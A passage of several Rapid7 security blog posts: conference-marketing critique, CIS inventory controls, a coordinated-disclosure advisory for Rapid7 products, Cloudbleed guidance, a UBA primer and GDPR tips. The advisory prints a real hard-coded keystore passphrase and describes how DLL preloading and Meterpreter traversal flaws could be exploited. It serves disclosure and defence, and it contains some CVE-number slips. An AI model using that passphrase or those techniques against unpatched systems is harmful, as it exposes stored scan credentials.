drone-swarm.jpgThe other half of the “so this technology is all I’ll ever need?” inference is your sudden explosion of options if you want our future machine overlords to defeat the inferior human attackers. Yes, I’m talking about “artificial intelligence” - but it didn’t stop there - one vendor had both AI and “swarm intelligence”. This is where marketing has started to go too far – at best, these solutions have some supervised machine learning algorithms and a data science team regularly using feedback to tune them [which is awesome, but not AI]; at worst, these solutions have unsupervised machine learning spewing out pointless anomalies in datasets unrelated to any realistic attacker behavior. While I loved the drone swarm responsible for the Super Bowl light show, humans were controlling those. If a single endpoint agent can discover a new malicious behavior and immediately communicate it back to the rest of the Borg-like swarm without any human assistance, they had better not quietly announce it for the first time at a conference hall.

 

“You want hunting, so we built automated, self-healing hunting agents!”

I noticed more vendors offering hunting services, even once as “hunting human attackers” [which caught my eye because of its clarity], and I’m not surprised given the significant barrier to small teams acquiring this advanced skill for detecting unknown threats. However, it’s already been fused with the legitimate demand for more automation in the incident response workflow to bring us a bevy of “automated hunting” and “automating the hunt” technologies, which would be oxymorons if they weren’t just pure contradictions of terms. “Automated hunting” sounds like the built-in indicators inherent to every detection solution I’ve seen, while “automating the hunt” can only be done by an advanced analyst who is scheduling hunts to occur and provide deltas for follow-up analysis, not by a piece of software looking for known indicators and unusual events. Sure, technology simplifies this process by revealing rare and unusual behavior, but detecting known IOCs is not hunting.

Heal Me WHITE ON BLACK.jpg

 

In a similar vein, I read about “self-healing endpoints” throughout downtown San Francisco and it brought up a lot more questions than answers. Are the deployed agents healing themselves when disabled? Will it heal my Windows 10 laptop after finding malware on it? Does it automatically restore any encrypted data from a ransomware attack? Can it administer virtual aspirin if it gets an artificial intelligence headache? Obviously, I could have visited a booth and asked these questions, but something tells me the answers would disappoint me.

 

“Re-imagined! ∞.0! Next-next-gen!”

After the Next-gen Firewall revolution, it seems like everybody is touting SIEM 2.0 and Next-gen AV, and it’s understandable when the available technologies for software development and data processing make leaps forward to enable a redesign of decade-old architectures, but the pace has now quickened. I ran across “deception 2.0” just two years after I first saw TrapX at RSA Conference and only a few months after I heard “deception technology” coined as a term for the niche. At this pace, we’ll be talking about Next-gen Deception and Swarm Intelligence 2.0 by Black Hat. As a general rule, if visitors to your booth have to ask “what is technology ‘x’?”, it’s too soon to start defining your company’s approach to it as 2.0.

 

As another reimagining of security, I’m enough of a geek to think virtual reality in a SOC sounds cool, but after seeing what it’s like to “bring VR to IR”, I felt like it’s adding to the skills an analyst needs to develop in addition to the list so long that specialization is key. Then, I remembered how often I see analysts resort to command line interfaces and the novelty wore off.

 

There are a lot of innovative approaches to the information security problems we face and I even saw some on display at RSA Conference. I just wish it weren’t such an exhausting fight through the noise to find them.

The Rapid7 Security Advisory Service relies heavily on the CIS top 20 critical controls as a framework for security program analysis because they are universally applicable to information security and IT governance. Correct implementation of all 20 of the critical controls greatly reduces security risk, lowers operational costs, and significantly improves any organization’s defensive posture.  The 20 critical controls are divided into System, Network, and Application families, and each control can be subdivided into sections in order to facilitate implementation and analysis.

 

The first of the 20 controls, “Inventory of Authorized and Unauthorized Devices” is split into 6 focused sections relating to network access control, automation and asset management. The control specifically addresses the need for awareness of what’s connected to your network (Tip: Don't forget to scan your network for IoT devices), as well as the need for proper internal inventory management and management automation. Implementing inventory control is probably the least glamorous way to improve a security program, but if it's done right it reduces insider threat and loss risks, cleans up the IT environment and improves the other 19 controls.

What it is:

The Inventory of Authorized and Unauthorized Devices is part of the “systems” group of the CIS top 20 critical security controls. It specifically addresses the need for awareness of what is on your network, as well as awareness of what shouldn’t be. Sections 1.1, 1.3 and 1.4 address the need for automated tracking and inventory, while 1.2, 1.5 and 1.6 are related to device-level network access control and management. The theme of the control is fairly simple; You should be able to see what is on your network, know which systems belong to whom, and use this information to prevent unauthorized users from connecting to the network. High maturity organizations often address the automation and management sections of this control well, but Rapid7 often sees gaps around network access control based on inventory due to the perceived complexity of implementing NAC.

 

How to implement it:

There are numerous effective ways to implement the Inventory of Authorized and Unauthorized Devices control. Many of them will also significantly improve the implementation of other controls relating to network access, asset configuration, and system management. Successful implementations often focus on bridging existing system inventory or configuration management services and device-based network access control. The inventory management portion is usually based on software or endpoint management services such as SCCM, while access control can leverage existing network technology to limit device access to networks.

Robust implementation of DHCP logging and management will effectively address sections 1.1, 1.2, and 1.4 of Critical Control #1. Deploying DHCP logging and using the outputs to establish awareness of what is currently connected to the network is an extremely good first step to full implementation. Tracking DHCP activity has an additional impact on the IT support and management side of the organization, as well; it serves as a sort of “early warning” system for network misconfiguration and management issues. For organizations with a SIEM solution or centralized audit repository, ingested DHCP logs can allow correlation with other security and network events. Correlating the logs against additional system information from tools like SCCM or event monitoring services can also assist with inventory tracking and automated inventory management, which has added benefits on the financial and operations management side of the shop, as well.

 

Admin Tips:

  • For DHCP-enabled network segments that have lower change rates (non-workstation segments) consider adding a detective control such as a notification of a new DHCP lease. Backup, VOIP, or network device management networks are often effective conduits for an attacker’s lateral movement efforts, and usually don’t have a high amount of device churn, so increasing detective controls there may create little administrative overhead and increase the possibility of detecting indicators of compromise.

 

  • The Inventory of Authorized and Unauthorized Devices control also recommends the use of automated inventory tools that scan the network to discover new systems or devices, as well as tracking the changes made to existing systems. While DHCP logging is an effective basic measure, tools such as SCCM, KACE, Munki, and SolarWinds effectively lower the effort and time surrounding inventory management, asset configuration, and system management. 

 

  • Many customers with existing Microsoft Enterprise Agreements may already have licenses available for SCCM. When combined with Certificate Authorities, Group Policies, and some creativity with Powershell, a handful of Administrators can maintain awareness and control of authorized devices to address many aspects of this foundational critical control.

 

 

Even if you don’t use SCCM or Nexpose, most agent-based system discovery and configuration management will allow organizations to address this control and other governance requirements. Effective implementation of inventory based access control will let the organization see and manage what is connecting to their network, which is critical for any good security program. While management tools often require time and effort to deploy, the cost benefit is significant; it allows smaller IT teams to have a major impact on their network quickly, and assists with patching, situational awareness, and malware defense.

Hat tip and thanks to Jason Beatty and Magen Wu for application-specific info and editorial suggestions.

 

Related: The CIS Critical Security Controls Explained – Control 2: Inventory of Authorized and Unauthorized Software

Today, we'd like to announce eight vulnerabilities that affect four Rapid7 products, as described in the table below. While all of these issues are relatively low severity, we want to make sure that our customers have all the information they need to make informed security decisions regarding their networks. If you are a Rapid7 customer who has any questions about these issues, please don't hesitate to contact your customer success manager (CSM), our support team, or leave a comment below.

 

For all of these vulnerabilities, the likelihood of exploitation is low, due to an array of mitigating circumstances, as explained below.

 

Rapid7 would like to thank Noah Beddome, Justin Lemay, Ben Lincoln (all of NCC Group); Justin Steven; and Callum Carney - the independent researchers who discovered and reported these vulnerabilities, and worked with us on pursuing fixes and mitigations.

 

Rapid7 ID

CVE

Product

Vulnerability

Status

NEX-49834

CVE-2017-5230

Nexpose

Hard-Coded Keystore Password

Mitigations available

MS-2417

CVE-2017-5228

Metasploit

stdapi Dir.download() Directory Traversal

Fixed (4.13.0-2017020701)

MS-2417

CVE-2017-5229

Metasploit

extapi Clipboard.parse_dump() Directory Traversal

Fixed (4.13.0-2017020701)

MS-2417

CVE-2017-5231

Metasploit

stdapi CommandDispatcher.cmd_download() Globbing  Directory Traversal

Fixed (4.13.0-2017020701)

PD-9462

CVE-2017-5232

Nexpose

DLL Preloading

Fixed (6.4.24)

PD-9462

CVE-2017-5233

AppSpider Pro

DLL Preloading

Fix in progress (6.14.053)

PD-9462

CVE-2017-5234

Insight Collector

DLL Preloading

Fixed (1.0.16)

PD-9462

CVE-2017-5235

Metasploit Pro

DLL Preloading

Fixed (4.13.0-2017022101)


CVE-2017-5230: Rapid7 Nexpose Static Java Keystore Passphrase

Cybersecurity firm NCC Group discovered a design issue in Rapid7's Nexpose vulnerability management solution, and has released an advisory with the relevant details here. This section briefly summarizes NCC Group's findings, explains the conditions that would need to be met in order to successfully exploit this issue, and offers mitigation advice for Nexpose users.

 

Conditions Required to Exploit

One feature of Nexpose, as with all other vulnerability management products, is the ability to configure a central repository of service account credentials so that a VM solution can login to networked assets and perform a comprehensive, authenticated scan for exposed, and patched, vulnerabilities. Of course, these credentials tend to be sensitive, since they tend to have broad reach across an organization's network, and care must be taken to store them safely.

 

The issue identified by NCC Group revolves around our Java keystore for storing these credentials, which is encrypted with a static, vendor-provided password, "r@p1d7k3y5t0r3." If a malicious actor were to get a hold of this keystore, that person could use this password to decrypt and expose all stored scan credentials. While this is not obviously documented, this password is often known to Nexpose customers and Rapid7 support engineers, since it's used in some backup recovery scenarios.

 

This vulnerability is not likely to offer an attacker much of an advantage however, since they would need to already have extraordinary control over your Nexpose installation in order to exercise it. This is because you need high level privileges to be able to actually get hold of the keystore that contains the stored credentials. So, in order to obtain and decrypt this file, an attacker would need to already have at least root/administrator privileges on the server running the Nexpose console, OR have a Nexpose console "Global Administrator" account, OR have access to a backup of a Nexpose console configuration.

 

If the attacker already has root on the Nexpose console, the jig is up; customers are already advised to restrict access to Nexpose servers through normal operating system and network controls. This level of access would already represent a serious security incident, since the attacker would have complete control over the Nexpose services and could leverage one of any number of techniques to extend privileges to other network assets, such as conducting local man-in-the-middle network monitoring, local memory profiling, or other, more creative techniques to increase access.

 

Similarly, Global Administrator access to the Nexpose console would, at minimum, allow an attacker to obtain a list of every vulnerable system in scope, alter or skip scheduled scans, and create new and malicious custom scan templates.

 

That leaves Nexpose console backups, which we believe represents the most likely attack vector. Sometimes, backups of critical configurations are stored in networked locations that aren't as secure as the backed-up system itself. We advise against this, for obvious reasons; if backups are not secured at least as well as the Nexpose server itself, it is straightforward to restore the backup to a machine under the attacker's control (where he would have root/administrator), and proceed to leverage that local privilege as above.

 

Designing a Fix

While encrypting these credentials at rest is clearly important for safety's sake, eventually these credentials do have to be decrypted, and the key to that decryption has to be stored somewhere. After all, the whole point of a scheduled, authenticated scan is to automate logins. Storing that key offline, in an operator's head, means having to deal with a password prompt anytime a scan kicks off. This would be a significant change in how the product works, and would be a change for the worse.

 

Designing a workable fix to this exposure is challenging. The simple solution is to enable users to pick their own passwords for this keystore, or generate one per installation. This would at least force attackers who have gained access to critical network infrastructure to do the work of either cracking the saved keystore, or do the slightly more complicated work of stepping through the decryption process as it executes.

 

Unfortunately, this approach would immediately render existing backups of the Nexpose console unusable -- a fact that tends to only be important at the least opportune time, after a disaster has taken out the hosting server. Given the privilege requirements of the attack, this trade-off, in our opinion, isn't worth the future disaster of unrestorable backups.

 

While we do expect to implement a new strategy for encrypting stored credentials in a future release, care will need to be taken to both ensure that the customer experience with disaster recovery remains the same and support costs aren't unreasonably impacted by this change.

 

Mitigations for CVE-2017-5320

Until an updated version is available, Nexpose customers who use authenticated scans are advised to take care in securing their Nexpose backups, as well as their Nexpose consoles, to avoid this and other exposures.

 

CVE-2017-5228, CVE-2017-5229, CVE-2017-5231: Metasploit Meterpreter Multiple Directory Traversal Issues

Metasploit Framework contributor and independent security researcher Justin Steven reported three issues in the way Metasploit Meterpreter handles certain directory structures on victim machines, which can ultimately lead to a directory traversal issue on the Meterpreter client. Justin reported his findings in an advisory, here.

 

Conditions Required to Exploit

In order to exploit this issue, we need to first be careful when discussing the "attacker" and "victim." In most cases, a user who is loading and launching Meterpreter on a remote computer is the "attacker," and that remote computer is the "victim." After all, few people actually want Meterpreter running on their machine, since it's normally delivered as a payload to an exploit.

 

However, this vulnerability flips these roles around. If a computer acts as a honeypot, and lures an attacker into loading and running Meterpreter on it, that honeypot machine has a unique opportunity to "hack back" at the original Metasploit user by exploiting these vulnerabilities.

 

So, in order for an attack to be successful, the attacker, in this case, must entice a victim into establishing a Meterpreter session to a computer under the attacker's control. Usually, this will be the direct result of an exploit attempt from a Metasploit user.

 

Designing a Fix

Justin worked closely with the Metasploit Framework team to develop fixes for all three issues. The fixes themselves can be inspected in the open source Metasploit framework repository, at Pull Requests 7930, 7931, and 7932, and ensure that data from Meterpreter sessions is properly inspected, since that data can possibly be evil. Huge thanks to Justin for his continued contributions to Metasploit!

 

Mitigations for CVE-2017-5228, CVE-2017-5229, CVE-2017-5230

In addition to updating Metasploit to at least version 4.3.20, Metasploit users can help protect themselves from the consequences of interacting with a purposefully malicious host with the use of Meterpreter's "Paranoid Mode," which can significantly reduce the threat of this and other undiscovered issues involving malicious Meterpreter sessions.

 

CVE-2017-5232, CVE-2017-5233, CVE-2017-5234, CVE-2017-5235: DLL Preloading

Independent security researcher Callum Carney reported to Rapid7 that the Nexpose and AppSpider installers ship with a DLL Preloading vulnerability, wherein an attacker could trick a user into running malicious code when installing Nexpose for the first time. Further investigation from Rapid7 Platform Delivery teams revealed that the installation applications for Metasploit Pro and the Insight Collector exhibit the same vulnerability.

 

Conditions Required to Exploit

DLL Preloading vulnerabilities are well described by Microsoft, here, but in short, DLL preloading vulnerabilities occur when a program fails to specify an exact path to a system DLL; instead, the program can seek that DLL in a number of default system locations, as well as the current directory.

 

In the case of an installation program, that current directory may be a general "Downloads" folder, which can contain binaries downloaded from all sorts of places.

 

If an attacker can convince a victim to download a malicious DLL, store it in the same location as one of the Rapid7 installers identified above, and then install one of those applications, the victim can trigger the vulnerability. In practice, DLL preloading vulnerabilities occur more often on shared workstations, where the attacker specifically poisons the Downloads directory with a malicious DLL and waits for the victim to download and install an application susceptible to this preloading attack. It is also sometimes possible to exercise a browser vulnerability to download (but not execute) an arbitrary file, and again, wait for the user to run an installer later. In all cases, the attacker must already have write permissions to a directory that contains the Rapid7 product installer.

 

Usually, people only install Rapid7 products once each per machine, so the window of exploitation is also severely limited.

 

Designing a Fix

In the case of Metasploit Pro, Nexpose, and the Insight Collector, the product installers were updated to define exactly where system DLLs are located, and no longer rely on dynamic searching for missing DLLs. An updated installer for Appspider Pro will be made available once testing is completed.

 

Mitigations for CVE-2017-5232, CVE-2017-5233, CVE-2017-5234, CVE-2017-5235

In all cases, users are advised to routinely clean out their "Downloads" folder, as this issue tends to crop up in installer packages in general. Of course, users should be aware of where they are downloading and running executable software, and Microsoft Windows executables support a robust, certificate-based signing procedure that can ensure that Windows binaries are, in fact, what they purport to be.

 

Users who keep historical versions of installers for backup and downgradability purposes should be careful to only launch those installation applications from empty directories, or at least, directories that do not contain unknown, unsigned, and possibly malicious DLLs.

 

Coordinated Disclosure Done Right

NCC Group, Justin Steven, and Callum Carney all approached Rapid7 with these issues privately, and have proven to be excellent and accommodating partners in reporting these vulnerabilities to us. As a publisher of vulnerability information ourselves, Rapid7 knows that this kind of work can at times be combative, unpleasant, and frustrating. Thankfully, that was not the case with these researchers, and we greatly appreciate their willingness to work with us and lend us their expertise.

 

If you're a Rapid7 customer who has any questions about this advisory, please don't hesitate to contact your regular support channel, or leave a comment below.

TL;DR

This week a vulnerability was disclosed, which could result in sensitive data being leaked from websites using Cloudflare's proxy services. The vulnerability - referred to as "Cloudbleed" - does not affect Rapid7's solutions/services.

 

This is a serious security issue, but it’s not a catastrophe. Out of an abundance of caution, we recommend you reset your passwords, starting with your most important accounts (especially admin accounts). A reasonable dose of skepticism and prudence will go a long way in effectively responding to this issue.

 

What’s the story on this Cloudflare vulnerability?

On February 18, 2017 Tavis Ormandy, a vulnerability researcher with Google’s Project Zero, uncovered sensitive data leaking from websites using Cloudflare’s proxy services, which are used for their content delivery network (CDN) and distributed denial-of-service (DDoS) mitigation services. Cloudflare provides a variety of services to a lot of websites - a few million, in fact. Tavis notified Cloudflare immediately. A few features in Cloudflare’s proxy services had been using a flawed HTML parser that leaked uninitialized memory from Cloudflare’s edge servers in some of their HTTP responses. Vulnerable features in Cloudflare’s service were disabled within hours of receiving Tavis’ disclosure, and their services were fully patched with all vulnerable features fully re-enabled within three days. Cloudflare has a detailed write-up about Cloudbleed's underlying issue and their response to it - check it out!

 

This Cloudflare memory leak issue is certainly serious, and it's great to see that Cloudflare is acting responsibly and rapidly after receiving a disclosure of Google’s findings on a Friday night. Most companies require several weeks to respond to vulnerability disclosures, but Cloudflare mitigated the vulnerability within hours and appears to have done the majority of the work required to fully remediate the issue in well under a week, starting on a weekend, which itself is impressive.

 

Why should I care?

Your information may have been leaked. Any vendor’s website using Cloudflare’s proxy service could have exposed your passwords, session cookies, keys, tokens, and other sensitive data. If your organization used this Cloudflare proxy service between September 22, 2016 and February 18, 2017, your data and your customers’ data could have been leaked and cached by search engines. As Ryan Lackey notes, “Regardless, unless it can be shown conclusively that your data was NOT compromised, it would be prudent to act as if it were.”

 

Who is affected by the Cloudflare vulnerability?

Before Tavis' disclosure, data had been leaking for months. It’s too soon to know the full scope of the data that was leaked and the sites and services that were affected (although we're off to a decent start). There is currently a fair amount of confusion and misalignment on the status of various services. For example, Tavis claims to have recovered cached 1Password API data, while 1Password claims users’ password data could not be exposed by this bug.

 

How bad is it, really?

One of the most important things to consider right now is that understanding the full impact of this Cloudflare bug will take some time; it’s too soon to know exactly how deep this goes. However, if we’re using Heartbleed as our de facto “security bug severity measuring stick”, it looks at this point like the Cloudflare bug is not as disastrous.

 

For starters, the Cloudflare bug was centralized in one place (i.e. Cloudflare’s proxy service). While search engines like Google, Bing, and Yahoo cached leaked data from Cloudflare, they were quick to purge these caches with Cloudflare’s help. Cloudflare stopped the bleeding and worked with Google and others to mop up the remaining mess very quickly. As of now, the scope of affected data seems relatively limited. According to Cloudflare, “The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage.”

 

On the other hand, Heartbleed existed for two years before it was disclosed. It also needed to be patched everywhere it existed - it was decentralized - and there are still systems vulnerable to Heartbleed today. There are known instances of attackers using Heartbleed to steal millions of records, months after a patch was released. At this point in time, there’s no evidence of attackers exploiting Cloudbleed.

 

Think about the “best case scenario” for users protecting themselves against the Cloudflare vulnerability vs. Heartbleed. To protect against Cloudbleed, users need to follow a few steps (which we’ve outlined below). To protect themselves from Heartbleed, users had to follow all of these same steps, reroll SSL/TLS certificates, and patch OpenSSL on all of their vulnerable systems.

 

What do I do now?

There are several steps you can take to protect yourself:

  1. Log out and log back into your accounts to inactivate your accounts' sessions, especially for sites/services that are known to have been impacted by this (e.g. Uber).
  2. Clear your browser cookies and cache.
  3. This is a great time to change your passwords, keys, and other potentially affected credentials - something you should be doing regularly anyway! While there was some talk of password manager data being exposed, this shouldn’t scare you away from using these tools. For the vast majority of us, it is the most practical way to ensure we’re using strong, unique passwords on every site with the ability to more easily update those passwords on a regular basis.
  4. Set up two-factor authentication on every one of your accounts that supports it, especially your password manager.
  5. If your website or services used services affected by the Cloudflare vulnerability during the time window mentioned above, force your users to reset all of their authentication credentials (passwords, OAuth tokens, API keys, etc.). Also reset credentials used for system and service accounts.
  6. Keep an eye out for notifications from your vendors, check their websites and blogs, and proactively contact them - especially those that handle your critical and sensitive data - about whether or not they were affected by this bug and how you can continue using their services securely if they were.
  7. If you’re not sure if you’re using an affected site or service, check out this tool: Does it use Cloudflare?

 

Big thanks to my teammate Katie Ledoux for writing this post with me!

As I mentioned in our last post, the 20 critical controls are divided into System, Network, and Application families in order to simplify analysis and implementation. This also allows partial implementation of the controls by security program developers who aren't building a program from scratch, but want to apply all 20 of the controls. The first two controls of the Center for Internet Security's (CIS) Critical Controls are based around inventory; in my experience, they're also often overlooked by most security teams at the level that the CIS and NIST address them. Knowledge and control of inventory is an essential security architecture need - done properly, it gives the security team very strong awareness of the organization's network and personnel environment, and significantly improves detection and response aspects of any security program.

 

The second control, “Inventory of Authorized and Unauthorized Software” is split into 4 sections, each dealing with a different aspect of software management. Much like Control 1, “Inventory of Authorized and Unauthorized Devices”, this control addresses the need for awareness of what’s running on your systems and network, as well as the need for proper internal inventory management. The CIS placed these controls as the "top 2" in much the same way that the NIST Cybersecurity Framework addresses them as "priority 1" controls on the 800-53 framework; inventory and endpoint-level network awareness is critical to decent incident response, protection and defense.


What it is:

The Inventory of Authorized and Unauthorized Software is part of the “systems” group of the 20 critical controls. The theme of the control is fairly simple: You should be able to see what software is on your systems, who installed it, and what it does. You should be able use this information to prevent unauthorized software from being installed on endpoints. The control is well outlined in NIST Special Publication 800-167, and relates back to NIST 800-53 and Cybersecurity Framework recommendations. High-maturity organizations often address the automation and management sections of this control well, but Rapid7 sees gaps around software configuration control based on inventory due to the perceived complexity of implementing software inventory management systems, or endpoint management clients.

 

How to implement it:

Many of the methods used to implement the inventory of authorized and unauthorized software will also significantly improve the implementation of other controls relating to network access, asset configuration, and system management (Controls 1,6,10, 14, 15, 17 and 19). Specifically, Local Administrator access and install rights should not be granted for most users. This limitation also assists with other critical controls that deal with access and authentication. Limiting who can install software also limits who can click “ok” on installations that include malware, adware and other unwanted code. The added bonus to successful removal of admin rights is the lowering of the shadow IT footprint in most organizations, contributing to better internal communication and security awareness.


Once installation rights have been limited, any whitelisting or blacklisting processes should be done in stages, typically starting with a list of unauthorized applications (a blacklist), and finishing with a list of authorized applications that make up the whitelist. This can be rolled out as an authorized software policy first, and followed up with scanning, removal and then, central inventory control. Successful implementations of software inventory control often focus on bridging system configuration management services and software blacklisting and whitelisting. The inventory management portion is usually based on a software inventory tool or endpoint management services such as SCCM, Footprints, or GPO and local policy controls on windows.

 

Beyond administrator and installation rights limiting, and blacklisting, some form of integrity checking and management should be set up. This is possible using only OS-based tools in most cases, and Microsoft includes integrity management tools in Windows 10. Typically, OS level integrity management tools rely on limiting installation based on a list of trusted actors (Installers, sources, etc). In more comprehensive cases, such as some endpoint protection services, there are heuristic and behavior based tools that monitor critical application libraries and paths for change. Since integrity management is intrinsically tied to malware prevention and data protection, implementing this section of the control actually assists with Controls 8,9 and 14: Browser and e-mail configuration, Malware Defenses and Data Protection.

 

Admin Tips:

  • Aside from AppLocker, Microsoft allows GPO based whitelisting for supported versions of Windows. These can be edited locally using “secpol.msc” on everything but the “Home” versions of Windows. Organizations with domain controllers or centrally managed Group Policy Objects can use the same process by accessing “software restriction policies” and adjusting the “designated file types” object to include authorized software. This method is effective for workstations with limited software needs, and single-purpose systems such as application servers or virtual machines that run dedicated software. Apple’s OSX and most flavors of Linux have similar features, although they may be a little harder to access.

 

  • Most endpoint protection suites have some form of integrity protection included as an add-on. Your milage may vary with this, since it can be tricky to tune the alerts from these services, but they're a helpful addition to the software integrity side of things, and can be used as a primary means of integrity control in cases where there's already a good inventory in place. 

 

  • For more general-purpose workstations, a number of client based solutions exist, ranging from antivirus and endpoint protection suites that limit software from a central console to tools like Carbon Black, Power Broker, and the Authority Management Suite integrated into Dell’s KACE.

 

Software inventory management is an important enough topic in security that The National Institute of Standards and Technology has published a guide to implementing software whitelisting which covers most of Control 2. It's part of their cybersecurity series, and is available for free on the NIST website as a PDF or by searching the site for publication 800-167. As I mentioned above, this control, and the device inventory control are critical to having a  responsive security program; getting the inventory side of the office in order will cut down on the amount of work needed when an incident arises, and will make policy development and enforcement far easier.

If you’re investing beyond malware detection, you’ve probably come across User Behavior Analytics (aka UBA, UEBA, SUBA). Why are organizations deploying UBA, and are they finding value in it? In this primer, let’s cover what’s being seen in the industry, and then a bit on how we’re approaching the problem here at Rapid7.

 

What Are Organizations Looking For?

According to the 2016 Verizon DBIR, 63% of data breaches involved weak, default, or compromised credentials. Companies have solid coverage for known malware and their network perimeter, but teams now need visibility into normal and anomalous user behavior. Largely, the response has been to deploy SIEM technology to monitor for these threats. While the tech is helping with log aggregation and correlation, teams aren’t consistently detecting the stealthy behavior real-world attackers are using to breach networks.

 

What Are the Analysts Saying About UBA?

Gartner: In their most recent Market Guide for User and Entity Behavior Analytics, they agree that UEBA vendors can help threat detection across a variety of use cases. However, they don’t make it easy by listing 29 vendors in the report, so be careful with selection – perhaps the most striking prediction is that “by 2020, less than five stand-alone UEBA solutions will remain in the market, with other vendors focusing on specific use cases and outcomes.”

 

Forrester: In the July 2016 Forrester report, Vendor Landscape: Security User Behavior Analytics (SUBA), a key takeaway is to “require a SUBA demonstration with your own data.” Something everyone is agreeing on is the need for user behavior analytics to be a part of a larger analytics suite, aptly named Security Analytics, which extends beyond SIEM to include network analysis and visibility, endpoint visibility, behavioral analysis, and forensic investigative tools. For more on this shift, we hosted guest speaker, Forrester senior analyst Joseph Blankenship, on the webcast, “The Struggle of SIEM”.

 

451 Research: In addition to rallying behind the need to go beyond SIEM with Security Analytics, there’s agreement that even in 2017, there will be a shakeout in the UBA space. That doesn’t just mean life or death for startup vendors, but also the challenge for large SIEM vendors to incorporate UBA into existing legacy platforms.

 

IDG: The suggested approach is under a security operations and analytics platform architecture (SOAPA). While SIEM technology still plays at the core, SOAPA also includes endpoint detection and response, an incident response platform, network security analytics, UBA, vulnerability management, anti-malware sandboxes, and threat intelligence. While that’s certainly a mouthful, the important takeaway is that UBA is only one of the technologies that should work together to detect threats across the entire attack chain.

 

Questions to Consider

  • If you’re looking at User Behavior Analytics, you’ve likely already experienced pain with an existing SIEM. Will you have enough resources to maintain both the SIEM deployment and a separate UBA tool?
  • Can you put the technology to the test? If you don’t have an internal red team, a great time to POC a UBA vendor is when considering a penetration test.
  • For more, check out our evaluation brief: A Matchmakers Guide to UBA Solutions.

 

And, for added context on the go, we just released a new episode all about UBA on the Security Nation podcast:

Security-Nation-UBA-Podcast.PNG

 

The Rapid7 Take

Since the first GA date of our UBA technology in early 2014, we’re proud to be both a first mover and have hundreds of customers using UBA to monitor their environments. However, we found that UBA technology alone still leaves gaps in detection coverage, forcing teams to jump between portals during every incident investigation. For that reason, InsightIDR, our solution for incident detection and response, combines SIEM, UBA, and Endpoint Detection capabilities, without the traditional burdens involved in deploying each of these technologies independently.

 

User-Behavior-Analytics-Primer-Rapid7.PNG

 

In addition to the UBA detecting stealthy behavior, InsightIDR also analyzes real-time endpoint data and uses Deception Technology to reveal behavior unseen by log analysis. Through a robust data search and visualization platform, security teams can bring together log search, user activity, and endpoint data for investigations without jumping between multiple tools. Of course, this is a bold claim - if you’d like to learn more, check out the below 3-minute Solution Overview or check out our webcast, User Behavior Analytics, as easy as ABC.

 

Sam Humphries

Preparing for GDPR

Posted by Sam Humphries Employee Feb 23, 2017

GDPR is coming….. Image result for GDPR is coming

If your organisation does business with Europe, or more specifically does anything with the Personal Data of EU Citizens who aren’t dead (i.e. Natural Persons), then, just like us, you’re going to be in the process of living the dream that is Preparing for the General Data Protection Regulation. For many organisations, this is going to be a gigantic exercise, as even if you have implemented processes and technologies to meet with current regulations there is still additional work to be done.

 

Penalties for infringements of GDPR can be incredibly hefty. They are designed to be dissuasive. Depending on the type of infringement, the fine can be €20 million, or 4% of your worldwide annual turnover, depending on which is the higher amount. Compliance is not optional, unless you fancy being fined eye-watering amounts of money, or you really don’t have any personal data of EU citizens within your control.

 

The Regulation applies from May 25th 2018. That’s the day from which organisations will be held accountable, and depending on which news website you choose to read, many organisations are far from ready at the time of writing this blog. Preparing for GDPR is likely to be a cross-functional exercise, as Legal, Risk & Compliance, IT, and Security all have a part to play. It’s not a small amount of regulation (are they ever?) to read and understand either – there are 99 Articles and 173 Recitals.

 

I expect if you’re reading this, it’s because you’re hunting for solutions, services, and guidance to help you prepare. Whilst no single software or services vendor can act as a magic bullet for GDPR, Rapid7 can certainly help you cover some of the major security aspects of protecting Personal Data, in addition to having solutions to help you detect attackers earlier in the attack chain, and service offerings that can help you proactively test your security measures, we can also jump into the fray if you do find yourselves under attack.

 

Processes and procedures, training, in addition to technology and services all have a part to play in GDPR. Having a good channel partner to work with during this time is vital as many will be able to provide you with the majority of aspects needed. For some organisations, changes to roles and responsibilities are required too – such as appointing a Data Protection Officer, and nominating representatives within the EU to be points of contact.

So what do I need to do?

If you’re just beginning in your GDPR compliance quest, I’d recommend you take a look at this guide which will get you started in your considerations. Additionally, having folks attend training so that they can understand and learn how to implement GDPR is highly recommended – spending a few pounds/euros/dollars, etc on training now can save you from the costly infringement fines later on down the line. There are many courses available – in the UK I recently took this foundation course, but do hunt around to find the best classroom or virtual courses that make sense for your location and teams.

 

Understanding where Personal Data physically resides, the categories of Personal Data you control and/or process, how and by whom it is accessed, and how it is secured are all areas that you have to deal with when complying with GDPR. Completing Privacy Impact Assessments are a good step here. Processes for access control, incident detection and response, breach notification and more will also need review or implementation. Being hit with a €20million+ fine is not something any organisation will want to be subject to. Depending on the size of your organisation, a fine of this magnitude could easily be a terminal moment.

 

There is some good news, demonstrating compliance, mitigating risk, and ensuring a high level of security are factors that are considered if you are unfortunate to experience a data breach. But ideally, not being breached in the first place is best, as I’m sure you‘d agree, so this is where your security posture comes in.

 

Article 5, which lists the six principles of processing personal data, states that personal data must be processed in an appropriate manner as to maintain security. This principal is covered in more detail by Article 32 which you can read more about here.

 

Ten Recommendations for Securing Your Environment

  1. Encrypt data – both at rest and in transit. If you are breached, but the Personal Data is in a render unintelligible to the attacker then you do not have to notify the Data Subjects (See Article 34 for more on this). There are lots of solutions on the market today – have a chat to your channel partner to see what options are best for you.
  2. Have a solid vulnerability management process in place, across the entire ecosystem. If you’re looking for best practices recommendations, do take a look at this post. Ensuring ongoing confidentiality, integrity and availability of systems is part of Article 32 – if you read Microsoft’s definition of a software vulnerability it talks to these three aspects.
  3. Backups. Backups. Backups. Please make backups. Not just in case of a dreaded ransomware attack; they are a good housekeeping facet anyway in case of things like storage failure, asset loss, natural disaster, even a full cup of coffee over the laptop. If you don’t currently have a backup vendor in place, Code42 have some great offerings for endpoints, and there are a plethora of server and database options available on the market today. Disaster recovery should always be high on your list regardless of which regulations you are required to meet.
  4. Secure your web applications. Privacy-by-design needs to be built in to processes and systems – if you’re collecting Personal Data via a web app and still using http/clear text then you’re already going to have a problem.
  5. Pen tests are your friend. Attacking your systems and environment to understand your weak spots will tell you where you need to focus, and it’s better to go through this exercise as a real-world scenario now than wait for a ‘real’ attacker to get in to your systems. You could do this internally using tools like Metasploit Pro, and you could employ a professional team to perform regular external tests too. Article 32 says that you need to have a process for regularly testing, assessing, & evaluating the effectiveness of security measures. Read more about Penetration testing in this toolkit.
